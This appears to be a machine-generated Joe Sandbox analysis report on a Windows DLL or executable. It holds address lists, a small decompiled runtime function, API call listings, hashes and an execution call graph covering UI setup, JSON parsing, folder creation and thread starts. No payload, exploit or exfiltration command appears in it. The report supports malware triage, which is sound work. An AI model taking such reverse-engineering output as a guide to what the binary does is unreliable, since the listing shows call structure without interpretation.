                                                                                        0x00000000
                                                                                        0x1000b206
                                                                                        0x1000b206
                                                                                        0x1000b209
                                                                                        0x1000b20a
                                                                                        0x1000b20b
                                                                                        0x1000b20c
                                                                                        0x1000b211
                                                                                        0x1000b204
                                                                                        0x1000b290
                                                                                        0x1000b295
                                                                                        0x1000b2a0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000b16e
                                                                                        0x1000b142
                                                                                        0x1000b144
                                                                                        0x1000b1a0
                                                                                        0x1000b1a4
                                                                                        0x1000b1a4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000b0d9
                                                                                        0x1000b0dc
                                                                                        0x1000b0df
                                                                                        0x1000b0e2
                                                                                        0x1000b0e5
                                                                                        0x1000b0e8
                                                                                        0x1000b0eb
                                                                                        0x1000b0eb
                                                                                        0x00000000
                                                                                        0x1000b0a8
                                                                                        0x1000b08a
                                                                                        0x1000b08a
                                                                                        0x1000b0f6
                                                                                        0x1000b0f8
                                                                                        0x00000000
                                                                                        0x1000b0fd
                                                                                        0x1000afcc
                                                                                        0x1000afcc
                                                                                        0x1000afcf
                                                                                        0x1000afd8
                                                                                        0x1000afdb
                                                                                        0x1000afe2
                                                                                        0x1000afe4
                                                                                        0x1000affd
                                                                                        0x1000affe
                                                                                        0x1000afff
                                                                                        0x1000b001
                                                                                        0x1000b006
                                                                                        0x1000afe6
                                                                                        0x1000afe6
                                                                                        0x1000afe9
                                                                                        0x1000afea
                                                                                        0x1000afec
                                                                                        0x1000afee
                                                                                        0x1000aff0
                                                                                        0x1000aff5
                                                                                        0x1000aff5
                                                                                        0x1000b009
                                                                                        0x1000b00b
                                                                                        0x1000b00d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000b013
                                                                                        0x1000b016
                                                                                        0x1000b018
                                                                                        0x1000b01a
                                                                                        0x00000000
                                                                                        0x1000b01c
                                                                                        0x1000b01c
                                                                                        0x1000b01f
                                                                                        0x00000000
                                                                                        0x1000b01f
                                                                                        0x00000000
                                                                                        0x1000b01a
                                                                                        0x1000b0fe
                                                                                        0x1000b101
                                                                                        0x1000b106
                                                                                        0x00000000
                                                                                        0x1000b109
                                                                                        0x1000af9c
                                                                                        0x1000af9c
                                                                                        0x1000afa3
                                                                                        0x1000afa4
                                                                                        0x1000afa6
                                                                                        0x1000afab
                                                                                        0x1000b10a
                                                                                        0x1000b10e
                                                                                        0x1000b10e
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 1000B0F8
                                                                                          • Part of subcall function 100061FC: IsProcessorFeaturePresent.KERNEL32(00000017,100061CE,10002953,?,?,?,10002953,00000016,?,?,100061DB,00000000,00000000,00000000,00000000,00000000), ref: 100061FE
                                                                                          • Part of subcall function 100061FC: GetCurrentProcess.KERNEL32(C0000417,?,10002953), ref: 10006220
                                                                                          • Part of subcall function 100061FC: TerminateProcess.KERNEL32(00000000,?,10002953), ref: 10006227
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                        • String ID: *?$.
                                                                                        • API String ID: 2667617558-3972193922
                                                                                        • Opcode ID: 2594d701efaf931e1261b2c9b14840bbe6070cfa06b9df4c9d314b67675ab6d0
                                                                                        • Instruction ID: 46c34acdc7c5aa81b7a3b98253d078278902de2cc824a51ad4aab6723cba5372
                                                                                        • Opcode Fuzzy Hash: 2594d701efaf931e1261b2c9b14840bbe6070cfa06b9df4c9d314b67675ab6d0
                                                                                        • Instruction Fuzzy Hash: 4651C775E0060A9FEB14CFA8C8819EEB7F5EF48390F258169E854E7305E731AE418B50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 82%
                                                                                        			E10002810(intOrPtr* __ecx) {
                                                                                        				intOrPtr _v0;
                                                                                        				intOrPtr* _t5;
                                                                                        				intOrPtr* _t7;
                                                                                        
                                                                                        				_t5 = __ecx;
                                                                                        				E10002942("string too long");
                                                                                        				asm("int3");
                                                                                        				_t7 = _t5;
                                                                                        				E1000284E(_t5, _v0);
                                                                                        				 *_t7 = 0x10013194;
                                                                                        				return _t7;
                                                                                        			}






                                                                                        0x10002810
                                                                                        0x10002815
                                                                                        0x1000281a
                                                                                        0x10002822
                                                                                        0x10002824
                                                                                        0x10002829
                                                                                        0x10002833

                                                                                        APIs
                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 10002815
                                                                                          • Part of subcall function 10002942: std::invalid_argument::invalid_argument.LIBCONCRT ref: 1000294E
                                                                                          • Part of subcall function 10002942: __CxxThrowException@8.LIBVCRUNTIME ref: 1000295C
                                                                                        • std::exception::exception.LIBCMT ref: 10002824
                                                                                          • Part of subcall function 1000284E: ___std_exception_copy.LIBVCRUNTIME ref: 1000286C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8ThrowXinvalid_argument___std_exception_copystd::_std::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                        • String ID: string too long
                                                                                        • API String ID: 3910473911-2556327735
                                                                                        • Opcode ID: b3efacef7c6cbd87b0ad032c07d3ce9b2a1ff870b3afc23c521cfaf108c44174
                                                                                        • Instruction ID: 9a287b720fa33632b7be0cdc73fe56c90b73a99ff9ef57bf627a32aac284b119
                                                                                        • Opcode Fuzzy Hash: b3efacef7c6cbd87b0ad032c07d3ce9b2a1ff870b3afc23c521cfaf108c44174
                                                                                        • Instruction Fuzzy Hash: 0AC08C3A600228338620FB95AC06DC6FF09EB111F0B008826FF485B615CF72EA9083E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:14.8%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:2.5%
                                                                                        Total number of Nodes:1887
                                                                                        Total number of Limit Nodes:26
                                                                                        execution_graph 10678 16bfb7 10684 16bfbb 10678->10684 10712 181b20 memset wvsprintfW 10684->10712 10687 16c1bc 10688 16c1da _time64 10687->10688 10820 16e090 ??0Value@Json@@QAE@W4ValueType@1@ ??0Reader@Json@@QAE ?parse@Reader@Json@@QAE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVValue@2@_N 10688->10820 10691 16c200 ?SetInstance@CPaintManagerUI@DuiLib@@SAXPAUHINSTANCE__@@ ?GetResourceDll@CPaintManagerUI@DuiLib@@SAPAUHINSTANCE__@ FindResourceW 10693 16c291 10691->10693 10694 16c22e ?GetResourceDll@CPaintManagerUI@DuiLib@@SAPAUHINSTANCE__@ LoadResource ?GetResourceDll@CPaintManagerUI@DuiLib@@SAPAUHINSTANCE__@ SizeofResource 10691->10694 10692 16c341 10831 1745a0 10692->10831 10950 1623b0 ??0WindowImplBase@DuiLib@@QAE ??0CTrayIcon@DuiLib@@QAE 10693->10950 10694->10693 10696 16c24e LockResource 10694->10696 10929 164940 10696->10929 10700 16c352 Sleep 10700->10700 10701 16c29c ?Create@CWindowWnd@DuiLib@@QAEPAUHWND__@@PAU3@PB_WKKHHHHPAUHMENU__@@ ?ShowModal@CWindowWnd@DuiLib@ 10951 1624a0 ?DestroyMenu@CMenuWnd@DuiLib@ 10701->10951 10702 16c275 10702->10693 10704 16c284 ?SetResourceZip@CPaintManagerUI@DuiLib@@SAXPAXIPB_W 10702->10704 10704->10693 10705 16c2e3 _time64 10955 1733e0 10705->10955 10708 16bef8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10922 1755f4 10708->10922 10710 16bf07 10711 16c32c _invalid_parameter_noinfo_noreturn 10711->10708 10713 181ba5 10712->10713 10713->10713 10969 163540 10713->10969 10715 181bc7 10981 16a8a0 10715->10981 10717 181c07 10996 1632d0 10717->10996 10719 181c19 10720 1632d0 12 API calls 10719->10720 10721 181c3e 10720->10721 10722 1632d0 12 API calls 10721->10722 10723 181c50 10722->10723 10724 181ce5 10723->10724 10726 181cc0 10723->10726 10725 1632d0 12 API calls 10724->10725 10727 181ce3 10725->10727 11041 182060 10726->11041 10729 181d80 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10727->10729 10732 181d7a _invalid_parameter_noinfo_noreturn 10727->10732 10730 181de3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10729->10730 10735 181ddd _invalid_parameter_noinfo_noreturn 10729->10735 10731 181e50 OutputDebugStringW 10730->10731 10733 181e46 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10730->10733 10736 181e40 _invalid_parameter_noinfo_noreturn 10730->10736 10734 1632d0 12 API calls 10731->10734 10732->10729 10733->10731 10737 181e9a 10734->10737 10735->10730 10736->10733 11011 16c3d0 10737->11011 10739 181eab 11016 184770 WideCharToMultiByte 10739->11016 10741 181eb7 10742 16c3d0 6 API calls 10741->10742 10743 181ece 10742->10743 11024 185680 10743->11024 10745 181ed3 10746 181f08 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10745->10746 10748 181f02 _invalid_parameter_noinfo_noreturn 10745->10748 10747 181f4a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10746->10747 10751 181f44 _invalid_parameter_noinfo_noreturn 10746->10751 10749 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10747->10749 10748->10746 10750 16c19f 10749->10750 10752 17eb60 10750->10752 10751->10747 11157 17f670 10752->11157 10754 17eb92 memset SHGetFolderPathW 10755 17ebd0 10754->10755 10755->10755 10756 163540 9 API calls 10755->10756 10757 17ebf1 10756->10757 11179 182540 10757->11179 10763 17f09e 10764 183380 12 API calls 10763->10764 10769 17f0ae 10764->10769 10768 17ef3d 10772 17ef9f std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10768->10772 10774 17ef99 _invalid_parameter_noinfo_noreturn 10768->10774 10770 182cc0 38 API calls 10769->10770 10776 17f24b 10770->10776 10778 183280 14 API calls 10772->10778 10773 17f497 memset GetModuleFileNameW 10775 17f4e7 10773->10775 10774->10772 10775->10775 10780 163540 9 API calls 10775->10780 10776->10773 10776->10776 10777 183280 14 API calls 10776->10777 10779 17f3d2 10777->10779 10781 17f013 10778->10781 10782 17f3e6 10779->10782 10789 163190 _invalid_parameter_noinfo_noreturn 10779->10789 10783 17f509 10780->10783 10784 17f027 10781->10784 10786 163190 _invalid_parameter_noinfo_noreturn 10781->10786 10787 17f448 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10782->10787 10794 17f442 _invalid_parameter_noinfo_noreturn 10782->10794 11242 1768d0 10783->11242 10788 17f089 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10784->10788 10795 17f083 _invalid_parameter_noinfo_noreturn 10784->10795 10786->10784 10791 1827b0 11 API calls 10787->10791 11292 1827b0 10788->11292 10789->10782 10790 17f51e 10793 17f55d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10790->10793 10798 17f557 _invalid_parameter_noinfo_noreturn 10790->10798 10796 17f45d PathIsDirectoryW 10791->10796 11272 176cc0 10793->11272 10794->10787 10795->10788 10796->10773 10797 17f47b CreateDirectoryW 10796->10797 10797->10773 10798->10793 10801 17f5dc 10802 17f63e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10801->10802 10805 17f638 _invalid_parameter_noinfo_noreturn 10801->10805 11280 182670 10802->11280 10803 163190 _invalid_parameter_noinfo_noreturn 10803->10801 10805->10802 10807 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10808 16c1a4 10807->10808 10809 175703 10808->10809 10810 175715 malloc 10809->10810 10811 16c1ae 10810->10811 10812 175708 _callnewh 10810->10812 10817 16c560 10811->10817 10812->10810 10814 175724 std::_Facet_Register 10812->10814 10813 1763af std::_Facet_Register 10815 1763bd _CxxThrowException 10813->10815 10814->10813 10816 1763a0 _CxxThrowException 10814->10816 10816->10813 10818 163540 9 API calls 10817->10818 10819 16c617 10818->10819 10819->10687 10821 16e100 ??AValue@Json@@QAEAAV01@PBD ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 10820->10821 10822 16e15f std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10820->10822 10823 16e123 atoi 10821->10823 10824 16e121 10821->10824 11344 16c700 10822->11344 10823->10822 10825 16e13b 10823->10825 10824->10823 10825->10822 10828 16e159 _invalid_parameter_noinfo_noreturn 10825->10828 10827 16e181 ??1Value@Json@@QAE 10829 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10827->10829 10828->10822 10830 16c1f8 10829->10830 10830->10691 10830->10692 10832 163540 9 API calls 10831->10832 10833 1745f5 10832->10833 11348 173510 10833->11348 10836 174642 ??AValue@Json@@QAEAAV01@PBD ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 10837 174665 atoi 10836->10837 10838 174663 10836->10838 10841 17467e 10837->10841 10842 1746ac ??AValue@Json@@QAEAAV01@PBD ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 10837->10842 10838->10837 10839 174e37 _beginthreadex 10840 16c700 _invalid_parameter_noinfo_noreturn 10839->10840 10843 174e5a ??1Value@Json@@QAE 10840->10843 10847 1746a2 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10841->10847 10851 17469c _invalid_parameter_noinfo_noreturn 10841->10851 10845 1746cf atoi 10842->10845 10846 1746cd 10842->10846 10848 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10843->10848 10844 174b58 10844->10839 10844->10844 10853 163540 9 API calls 10844->10853 10849 1746e2 10845->10849 10850 174710 ??AValue@Json@@QAEAAV01@PBD ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 10845->10850 10846->10845 10847->10842 10852 16c34c 10848->10852 10854 174706 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10849->10854 10858 174700 _invalid_parameter_noinfo_noreturn 10849->10858 10855 174733 atoi 10850->10855 10856 174731 10850->10856 10851->10847 10852->10700 10857 174c8b 10853->10857 10854->10850 10859 174746 10855->10859 10860 174774 ??AValue@Json@@QAEAAV01@PBD ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 10855->10860 10856->10855 10874 163540 9 API calls 10857->10874 10858->10854 10861 17476a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10859->10861 10864 174764 _invalid_parameter_noinfo_noreturn 10859->10864 10862 174797 atoi 10860->10862 10863 174795 10860->10863 10861->10860 10865 1747aa 10862->10865 10866 1747d8 ??AValue@Json@@QAEAAV01@PBD ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 10862->10866 10863->10862 10864->10861 10867 1747ce std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10865->10867 10873 1747c8 _invalid_parameter_noinfo_noreturn 10865->10873 10869 1747fb atoi 10866->10869 10870 1747f9 10866->10870 10867->10866 10871 17480e 10869->10871 10872 17483c ??AValue@Json@@QAEAAV01@PBD ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 10869->10872 10870->10869 10875 174832 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10871->10875 10879 17482c _invalid_parameter_noinfo_noreturn 10871->10879 10876 17485f atoi 10872->10876 10877 17485d 10872->10877 10873->10867 10878 174e2b 10874->10878 10875->10872 10880 174872 10876->10880 10881 1748a0 ??AValue@Json@@QAEAAV01@PBD ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 10876->10881 10877->10876 11406 1811c0 10878->11406 10879->10875 10883 174896 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10880->10883 10885 174890 _invalid_parameter_noinfo_noreturn 10880->10885 10886 1748c7 10881->10886 10883->10881 10885->10883 11364 163450 10886->11364 10888 1748e7 10889 174921 ??AValue@Json@@QAEAAV01@PBD ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 10888->10889 10890 174917 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10888->10890 10895 174911 _invalid_parameter_noinfo_noreturn 10888->10895 10891 174944 atoi 10889->10891 10892 174942 10889->10892 10890->10889 10893 174957 10891->10893 10894 174985 ??AValue@Json@@QAEAAV01@PBD ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 10891->10894 10892->10891 10896 17497b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10893->10896 10899 174975 _invalid_parameter_noinfo_noreturn 10893->10899 10897 1749a6 10894->10897 10898 1749a8 atoi 10894->10898 10895->10890 10896->10894 10897->10898 10900 1749bb 10898->10900 10901 1749e9 ??AValue@Json@@QAEAAV01@PBD ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 10898->10901 10899->10896 10904 1749df std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10900->10904 10907 1749d9 _invalid_parameter_noinfo_noreturn 10900->10907 10902 174a0c atoi 10901->10902 10903 174a0a 10901->10903 10905 174a1f 10902->10905 10906 174a4d ??AValue@Json@@QAEAAV01@PBD ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 10902->10906 10903->10902 10904->10901 10908 174a43 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10905->10908 10911 174a3d _invalid_parameter_noinfo_noreturn 10905->10911 10909 174a70 atoi 10906->10909 10910 174a6e 10906->10910 10907->10904 10908->10906 10912 174aa7 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10909->10912 10914 174a83 10909->10914 10910->10909 10911->10908 10913 163450 9 API calls 10912->10913 10915 174ad8 ??AValue@Json@@QAEAAV01@PBD ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 10913->10915 10914->10912 10916 174aa1 _invalid_parameter_noinfo_noreturn 10914->10916 11376 173bd0 10915->11376 10916->10912 10919 174b33 10919->10844 10921 174b45 _beginthreadex 10919->10921 10920 174b20 _beginthreadex 10920->10919 10921->10844 10923 1755ff IsProcessorFeaturePresent 10922->10923 10924 1755fd 10922->10924 10926 176199 10923->10926 10924->10710 11860 17615d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10926->11860 10928 17627c 10928->10710 10932 16495f 10929->10932 10930 164b17 10930->10702 10931 164aaa 10933 164ab5 memmove memmove memmove 10931->10933 10934 164af3 memmove memmove 10931->10934 10932->10930 10932->10931 10935 164b1f 10932->10935 10938 16499c 10932->10938 10933->10702 10934->10930 11861 164d00 ?_Xlength_error@std@@YAXPBD 10935->11861 10939 1649f2 10938->10939 10940 1649cb 10938->10940 10942 1649dc 10939->10942 10943 175703 std::_Facet_Register 4 API calls 10939->10943 10941 175703 std::_Facet_Register 4 API calls 10940->10941 10941->10942 10944 164a05 memmove 10942->10944 10945 164aa4 _invalid_parameter_noinfo_noreturn 10942->10945 10943->10942 10946 164a35 memmove memmove 10944->10946 10947 164a23 memmove 10944->10947 10945->10931 10948 164a5a 10946->10948 10947->10948 10948->10945 10949 164a7d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10948->10949 10949->10702 10950->10701 10952 16251f ??1CTrayIcon@DuiLib@@QAE ??1WindowImplBase@DuiLib@@UAE 10951->10952 10953 1624ff ??1CMenuWnd@DuiLib@@QAE 10951->10953 10952->10705 10954 162512 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10953->10954 10954->10952 10956 17341a 10955->10956 10957 175480 13 API calls 10956->10957 10958 17345b 10957->10958 10959 16c3d0 6 API calls 10958->10959 10960 173470 10959->10960 10961 183c60 136 API calls 10960->10961 10962 173479 10961->10962 10963 1734a8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10962->10963 10965 1734a2 _invalid_parameter_noinfo_noreturn 10962->10965 10964 1734e4 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10963->10964 10968 1734de _invalid_parameter_noinfo_noreturn 10963->10968 10966 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10964->10966 10965->10963 10967 16c2fc 10966->10967 10967->10708 10967->10711 10968->10964 10970 163553 memmove 10969->10970 10974 163587 10969->10974 10970->10715 10972 16363c 11069 1631f0 ?_Xlength_error@std@@YAXPBD 10972->11069 10974->10972 11059 163260 10974->11059 10977 1635cf memcpy 10978 1635f9 10977->10978 10979 16361a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10977->10979 10978->10979 10980 163636 _invalid_parameter_noinfo_noreturn 10978->10980 10979->10715 10980->10972 10982 16a8bc 10981->10982 10995 16a96b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 10981->10995 10984 16a9a9 10982->10984 10986 16a8d0 10982->10986 10982->10995 10983 16aa0b 11070 1631f0 ?_Xlength_error@std@@YAXPBD 10983->11070 10987 16a9b3 memcpy 10984->10987 10984->10995 10986->10983 10991 163260 5 API calls 10986->10991 10989 16a957 10987->10989 10987->10995 10990 16aa05 _invalid_parameter_noinfo_noreturn 10989->10990 10989->10995 10990->10983 10992 16a920 10991->10992 10993 16a93c memcpy 10992->10993 10994 16a98b memcpy 10992->10994 10993->10989 10993->10995 10994->10717 10995->10717 10997 1632f2 memmove 10996->10997 10998 16332b 10996->10998 10997->10719 11000 16343d 10998->11000 11001 16333a 10998->11001 11071 1631f0 ?_Xlength_error@std@@YAXPBD 11000->11071 11004 163260 5 API calls 11001->11004 11005 16337d 11004->11005 11006 16340f memcpy memcpy 11005->11006 11007 1633ac memcpy memcpy 11005->11007 11006->10719 11008 1633dd 11007->11008 11010 1633ed std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11007->11010 11009 163409 _invalid_parameter_noinfo_noreturn 11008->11009 11008->11010 11009->11006 11010->10719 11012 16c3f5 11011->11012 11013 16c3fc 11012->11013 11014 163260 5 API calls 11012->11014 11013->10739 11015 16c42e memcpy 11014->11015 11015->10739 11072 1755e6 11016->11072 11018 1847d9 memset WideCharToMultiByte 11019 184820 11018->11019 11019->11019 11020 163450 9 API calls 11019->11020 11021 184832 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11020->11021 11022 18486f std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11021->11022 11023 184869 _invalid_parameter_noinfo_noreturn 11021->11023 11022->10741 11023->11022 11073 1849b0 11024->11073 11026 1856c0 11076 184f10 11026->11076 11028 1856df 11029 185700 ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 11028->11029 11030 1856f4 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 11028->11030 11031 18570a 11029->11031 11030->11031 11032 18575b 11031->11032 11033 18571b ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J 11031->11033 11086 184a90 11032->11086 11090 16a740 11033->11090 11036 185768 11039 18579a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11036->11039 11040 185794 _invalid_parameter_noinfo_noreturn 11036->11040 11037 18573b 11037->11032 11038 18573f ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 11037->11038 11038->11032 11039->10745 11040->11039 11042 182079 11041->11042 11043 18227b 11041->11043 11045 18208e memmove memcpy memcpy 11042->11045 11046 182135 11042->11046 11129 164210 ?_Xout_of_range@std@@YAXPBD 11043->11129 11045->10727 11047 182280 11046->11047 11048 182144 11046->11048 11145 1631f0 ?_Xlength_error@std@@YAXPBD 11047->11145 11052 163260 5 API calls 11048->11052 11053 182187 11052->11053 11054 1821c9 memcpy memcpy memcpy 11053->11054 11055 18223f memcpy memcpy memcpy 11053->11055 11056 18220d 11054->11056 11057 18221d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11054->11057 11055->10727 11056->11057 11058 182239 _invalid_parameter_noinfo_noreturn 11056->11058 11057->10727 11058->11055 11060 163270 11059->11060 11061 1632aa 11060->11061 11062 175703 std::_Facet_Register 4 API calls 11060->11062 11063 1632bb 11061->11063 11065 175703 std::_Facet_Register 4 API calls 11061->11065 11064 16328e 11062->11064 11063->10977 11066 163297 11064->11066 11067 1632a4 _invalid_parameter_noinfo_noreturn 11064->11067 11068 1632b4 11065->11068 11066->10977 11067->11061 11068->10977 11074 1849e9 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE 11073->11074 11075 184a06 ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11073->11075 11074->11075 11075->11026 11077 184f43 ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH 11076->11077 11078 184fd4 11076->11078 11077->11078 11079 184f58 11077->11079 11078->11028 11096 184da0 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11079->11096 11083 184f7b ?always_noconv@codecvt_base@std@ 11084 184f95 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11083->11084 11085 184f8c 11083->11085 11084->11085 11085->11028 11087 184ae6 11086->11087 11088 184b12 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 11087->11088 11089 16a740 9 API calls 11087->11089 11088->11036 11089->11088 11091 16a74e 11090->11091 11092 16a74a 11090->11092 11113 16a220 11091->11113 11093 16a76f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11092->11093 11093->11037 11095 16a753 fclose 11095->11093 11097 184e09 ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2 11096->11097 11098 184dc3 _get_stream_buffer_pointers 11096->11098 11099 1848b0 ??0_Lockit@std@@QAE@H ??Bid@locale@std@ 11097->11099 11098->11097 11100 18490b 11099->11100 11101 184970 ??1_Lockit@std@@QAE 11100->11101 11102 184929 11100->11102 11103 18491f ?_Getgloballocale@locale@std@@CAPAV_Locimp@12 11100->11103 11101->11083 11102->11101 11104 18493a ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@ 11102->11104 11103->11102 11105 18498d 11104->11105 11106 18494d 11104->11106 11109 184995 _CxxThrowException 11105->11109 11110 18c9f2 11106->11110 11111 175703 std::_Facet_Register 4 API calls 11110->11111 11112 18495d 11111->11112 11112->11101 11114 16a2c3 11113->11114 11115 16a23e 11113->11115 11116 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11114->11116 11115->11114 11118 16a250 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD 11115->11118 11119 16a278 11115->11119 11117 16a2d1 11116->11117 11117->11095 11120 16a26e 11118->11120 11121 16a28a 11118->11121 11122 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11119->11122 11120->11121 11123 16a273 11120->11123 11125 16a2ac 11121->11125 11126 16a298 fwrite 11121->11126 11124 16a286 11122->11124 11123->11114 11123->11119 11124->11095 11127 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11125->11127 11126->11119 11126->11125 11128 16a2bf 11127->11128 11128->11095 11130 164220 11129->11130 11131 164242 memset 11130->11131 11132 164271 11130->11132 11131->11047 11133 164280 11132->11133 11134 16437a 11132->11134 11146 163200 11133->11146 11156 1631f0 ?_Xlength_error@std@@YAXPBD 11134->11156 11139 1642c7 